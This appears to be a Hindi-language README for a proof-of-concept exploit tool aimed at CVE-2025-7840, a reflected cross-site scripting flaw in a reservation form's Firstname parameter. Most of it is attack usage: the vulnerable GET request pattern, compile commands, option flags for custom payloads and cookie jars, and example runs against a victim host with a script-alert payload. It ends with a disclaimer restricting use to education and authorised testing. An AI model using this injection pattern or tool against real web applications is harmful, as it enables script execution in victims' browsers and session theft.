
CVE-2025-7840 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो रिजर्वेशन फॉर्म के Firstname पैरामीटर में दुर्भावनापूर्ण पेलोड इंजेक्ट करके XSS ट्रिगर करता है।
लेखक: Byte Reaper (@ByteReaper0)
CVE-2025-7840 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो एक संवेदनशील वेब एप्लिकेशन एंडपॉइंट को लक्षित करता है, जो रिजर्वेशन फॉर्म के Firstname पैरामीटर पर उपयोगकर्ता इनपुट को सैनिटाइज़ करने में विफल रहता है। एक GET अनुरोध तैयार करके:
/index.php?page=reserve&Firstname=<payload>&Lastname=test
एक हमलावर पीड़ित के ब्राउज़र में मनमाना जावास्क्रिप्ट इंजेक्ट और निष्पादित कर सकता है जब प्रतिक्रिया प्रस्तुत की जाती है।
-b विकल्प के साथ कस्टम पेलोड इंजेक्ट करें-c विकल्प के माध्यम से कुकी-आधारित सत्र संभालें-v)libcurl विकास हेडरargparse लाइब्रेरीएक्सप्लॉइट संकलित करें:
gcc -o exploit exploit.c argparse.c -lcurl
sudo ./exploit -u <TARGET_URL> [options]
| फ़्लैग | विवरण |
|---|---|
-u URL | लक्ष्य आधार URL (जैसे http://victim.local) |
-b PAYLOAD | इंजेक्ट करने के लिए कस्टम XSS पेलोड |
-c FILE | सत्र संभालने के लिए कुकी जार फ़ाइल |
-v | वर्बोज़ मोड (अनुरोध/प्रतिक्रिया विवरण दिखाएँ) |
लक्ष्य के विरुद्ध डिफ़ॉल्ट पेलोड चलाएँ:
sudo ./exploit -u http://victim.local
कस्टम पेलोड का उपयोग करें:
sudo ./exploit -u http://victim.local -b "<script>alert(\'PWNED\')</script>"
सत्र कुकीज़ और वर्बोज़ आउटपुट शामिल करें:
sudo ./exploit -u http://victim.local -c cookies.txt -v
यह कोड केवल शैक्षिक और परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।
MIT